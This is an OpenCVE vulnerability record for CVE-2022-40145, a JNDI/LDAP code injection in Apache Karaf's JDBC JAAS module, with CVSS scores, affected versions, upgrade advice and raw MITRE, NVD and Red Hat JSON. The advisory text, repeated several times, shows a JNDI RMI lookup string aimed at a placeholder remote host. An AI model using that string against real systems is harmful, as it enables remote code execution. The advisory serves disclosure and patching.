CVE-2022-40145 - Vulnerability Details - OpenCVE

This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

No CVSS v4.0

Attack Vector Network

Attack Complexity Low

Privileges Required None

Scope Unchanged

Confidentiality Impact High

Integrity Impact High

Availability Impact High

User Interaction None

No CVSS v3.0

No CVSS v2

This CVE is not in the KEV list.

Key SSVC decision points have not yet been added.

Vendors	Products
Apache	Karaf

Configuration 1 [-]

OR	cpe:2.3:a:apache:karaf::::::::
	cpe:2.3:a:apache:karaf::::::::

No data.

References

Link	Providers
https://karaf.apache.org/security/cve-2022-40145.txt
https://nvd.nist.gov/vuln/detail/CVE-2022-40145
https://www.cve.org/CVERecord?id=CVE-2022-40145

History

No history.

MITRE

Status: PUBLISHED

Assigner: apache

Published: 2022-12-21T15:23:42.847Z

Updated: 2024-08-03T12:14:39.957Z

Reserved: 2022-09-07T08:02:30.677Z

Link: CVE-2022-40145

Vulnrichment

No data.

NVD

Status : Modified

Published: 2022-12-21T16:15:08.930

Modified: 2024-11-21T07:20:58.460

Link: CVE-2022-40145

Redhat

Severity : Important

Publid Date: 2022-12-21T00:00:00Z

Links: CVE-2022-40145 - Bugzilla

{"dataType": "CVE_RECORD", "dataVersion": "5.1", "cveMetadata": {"cveId": "CVE-2022-40145", "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09", "state": "PUBLISHED", "assignerShortName": "apache", "dateReserved": "2022-09-07T08:02:30.677Z", "datePublished": "2022-12-21T15:23:42.847Z", "dateUpdated": "2024-08-03T12:14:39.957Z"}, "containers": {"cna": {"affected": [{"defaultStatus": "unaffected", "product": "Apache Karaf", "vendor": "Apache Software Foundation", "versions": [{"lessThan": "4.4.2", "status": "affected", "version": "4.4.0", "versionType": "maven"}, {"lessThan": "4.3.8", "status": "affected", "version": "0", "versionType": "maven"}]}], "credits": [{"lang": "en", "type": "reporter", "value": "Xun Bai <bbbbear68@gmail.com>"}], "descriptions": [{"lang": "en", "supportingMedia": [{"base64": false, "type": "text/html", "value": "<span style=\"background-color: rgb(255, 255, 255);\">This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.<br><br>The function jaas.modules.src.main.java.por</span><span style=\"background-color: rgb(255, 255, 255);\">g.apache.karaf.jass.modules.</span><span style=\"background-color: rgb(255, 255, 255);\">jdbc.JDBCUtils#doCreateDatasou</span><span style=\"background-color: rgb(255, 255, 255);\">rce</span><br><span style=\"background-color: rgb(255, 255, 255);\">use InitialContext.lookup(jndiName</span><span style=\"background-color: rgb(255, 255, 255);\">) without filtering.<br>An user can modify </span><span style=\"background-color: rgb(255, 255, 255);\">`options.put(JDBCUtils.DATASOU</span><span style=\"background-color: rgb(255, 255, 255);\">RCE, \"osgi:\" + </span><span style=\"background-color: rgb(255, 255, 255);\">DataSource.class.getName());` to `options.put(JDBCUtils.DATASOU</span><span style=\"background-color: rgb(255, 255, 255);\">RCE,</span><span style=\"background-color: rgb(255, 255, 255);\">\"jndi:rmi://x.x.x.x:xxxx/Comma</span><span style=\"background-color: rgb(255, 255, 255);\">nd\");` in JdbcLoginModuleTest#setup.</span><br><br><span style=\"background-color: rgb(255, 255, 255);\">This is vulnerable to a remote code execution (RCE) attack when a</span><br><span style=\"background-color: rgb(255, 255, 255);\">configuration uses a JNDI LDAP data source URI when an attacker has</span><br><span style=\"background-color: rgb(255, 255, 255);\">control of the target LDAP server.</span><p>This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.</p>We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8"}], "value": "This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.\n\nThe function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource\nuse InitialContext.lookup(jndiName) without filtering.\nAn user can modify\u00a0`options.put(JDBCUtils.DATASOURCE, \"osgi:\" +\u00a0DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://x.x.x.x:xxxx/Command\");` in JdbcLoginModuleTest#setup.\n\nThis is vulnerable to a remote code execution (RCE) attack when a\nconfiguration uses a JNDI LDAP data source URI when an attacker has\ncontrol of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.\n\nWe encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8"}], "metrics": [{"other": {"content": {"text": "low"}, "type": "Textual description of severity"}}], "problemTypes": [{"descriptions": [{"cweId": "CWE-74", "description": "CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "lang": "en", "type": "CWE"}]}, {"descriptions": [{"cweId": "CWE-20", "description": "CWE-20 Improper Input Validation", "lang": "en", "type": "CWE"}]}], "providerMetadata": {"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09", "shortName": "apache", "dateUpdated": "2022-12-21T15:23:42.847Z"}, "references": [{"tags": ["vendor-advisory"], "url": "https://karaf.apache.org/security/cve-2022-40145.txt"}], "source": {"defect": ["KARAF-7568"], "discovery": "EXTERNAL"}, "title": "Apache Karaf: JDBC JAAS LDAP injection", "x_generator": {"engine": "Vulnogram 0.1.0-dev"}}, "adp": [{"providerMetadata": {"orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE", "dateUpdated": "2024-08-03T12:14:39.957Z"}, "title": "CVE Program Container", "references": [{"tags": ["vendor-advisory", "x_transferred"], "url": "https://karaf.apache.org/security/cve-2022-40145.txt"}]}]}}

{"configurations": [{"nodes": [{"cpeMatch": [{"criteria": "cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:*", "matchCriteriaId": "CEDC6799-2894-4DB9-A66B-9481580EDC66", "versionEndExcluding": "4.3.8", "vulnerable": true}, {"criteria": "cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:*", "matchCriteriaId": "3320F4C0-A9F6-43C3-B473-1E56EFD0086D", "versionEndExcluding": "4.4.2", "versionStartIncluding": "4.4.0", "vulnerable": true}], "negate": false, "operator": "OR"}]}], "descriptions": [{"lang": "en", "value": "This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.\n\nThe function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource\nuse InitialContext.lookup(jndiName) without filtering.\nAn user can modify\u00a0`options.put(JDBCUtils.DATASOURCE, \"osgi:\" +\u00a0DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://x.x.x.x:xxxx/Command\");` in JdbcLoginModuleTest#setup.\n\nThis is vulnerable to a remote code execution (RCE) attack when a\nconfiguration uses a JNDI LDAP data source URI when an attacker has\ncontrol of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.\n\nWe encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8"}, {"lang": "es", "value": "Esta vulnerabilidad se trata de una posible inyecci\u00f3n de c\u00f3digo cuando un atacante tiene el control del servidor LDAP de destino utilizando la URL JDBC JNDI. La funci\u00f3n jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource utiliza InitialContext.lookup(jndiName) sin filtrar. Un usuario puede modificar `options.put(JDBCUtils.DATASOURCE, \"osgi:\" + DataSource.class.getName());` a `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://xxxx:xxxx/Command \");` en JdbcLoginModuleTest#setup. Esto es vulnerable a un ataque de ejecuci\u00f3n remota de c\u00f3digo (RCE) cuando una configuraci\u00f3n utiliza un URI de origen de datos LDAP JNDI cuando un atacante tiene control del servidor LDAP de destino. Este problema afecta a todas las versiones de Apache Karaf hasta 4.4.1 y 4.3.7. Animamos a los usuarios a actualizar a Apache Karaf al menos 4.4.2 o 4.3.8."}], "id": "CVE-2022-40145", "lastModified": "2024-11-21T07:20:58.460", "metrics": {"cvssMetricV31": [{"cvssData": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary"}]}, "published": "2022-12-21T16:15:08.930", "references": [{"source": "security@apache.org", "tags": ["Vendor Advisory"], "url": "https://karaf.apache.org/security/cve-2022-40145.txt"}, {"source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Vendor Advisory"], "url": "https://karaf.apache.org/security/cve-2022-40145.txt"}], "sourceIdentifier": "security@apache.org", "vulnStatus": "Modified", "weaknesses": [{"description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-74"}], "source": "security@apache.org", "type": "Secondary"}, {"description": [{"lang": "en", "value": "NVD-CWE-Other"}], "source": "nvd@nist.gov", "type": "Primary"}]}

{"bugzilla": {"description": "karaf: JDBC JAAS LDAP injection", "id": "2257304", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2257304"}, "csaw": false, "cvss3": {"cvss3_base_score": "9.8", "cvss3_scoring_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "status": "draft"}, "cwe": "CWE-20", "details": ["This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.\nThe function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource\nuse InitialContext.lookup(jndiName) without filtering.\nAn user can modify\u00a0`options.put(JDBCUtils.DATASOURCE, \"osgi:\" +\u00a0DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://x.x.x.x:xxxx/Command\");` in JdbcLoginModuleTest#setup.\nThis is vulnerable to a remote code execution (RCE) attack when a\nconfiguration uses a JNDI LDAP data source URI when an attacker has\ncontrol of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.\nWe encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8", "A flaw was found in Apache Karaf. This issue may allow an attacker to control the LDAP server used by the JDBC JNDI URL and execute code remotely (RCE)."], "mitigation": {"lang": "en:us", "value": "No mitigation is currently available."}, "name": "CVE-2022-40145", "package_state": [{"cpe": "cpe:/a:redhat:jboss_enterprise_brms_platform:7", "fix_state": "Not affected", "package_name": "Karaf", "product_name": "Red Hat Decision Manager 7"}, {"cpe": "cpe:/a:redhat:jboss_fuse:7", "fix_state": "Not affected", "package_name": "Karaf", "product_name": "Red Hat Fuse 7"}, {"cpe": "cpe:/a:redhat:jboss_amq:6", "fix_state": "Out of support scope", "package_name": "karaf", "product_name": "Red Hat JBoss A-MQ 6"}, {"cpe": "cpe:/a:redhat:jboss_data_grid:7", "fix_state": "Out of support scope", "package_name": "karaf", "product_name": "Red Hat JBoss Data Grid 7"}, {"cpe": "cpe:/a:redhat:jboss_fuse:6", "fix_state": "Out of support scope", "package_name": "Karaf", "product_name": "Red Hat JBoss Fuse 6"}, {"cpe": "cpe:/a:redhat:jboss_enterprise_bpms_platform:7", "fix_state": "Not affected", "package_name": "karaf", "product_name": "Red Hat Process Automation 7"}], "public_date": "2022-12-21T00:00:00Z", "references": ["https://www.cve.org/CVERecord?id=CVE-2022-40145\nhttps://nvd.nist.gov/vuln/detail/CVE-2022-40145\nhttps://karaf.apache.org/security/cve-2022-40145.txt"], "statement": "This attack requires previous control of the LDAP target server in order to obtain access and perform code execution. Considering the pre-requisites for this vulnerability to be exploited, the impact is Important and not Critical.", "threat_severity": "Important", "upstream_fix": "karaf 4.4.2, karaf 4.3.8"}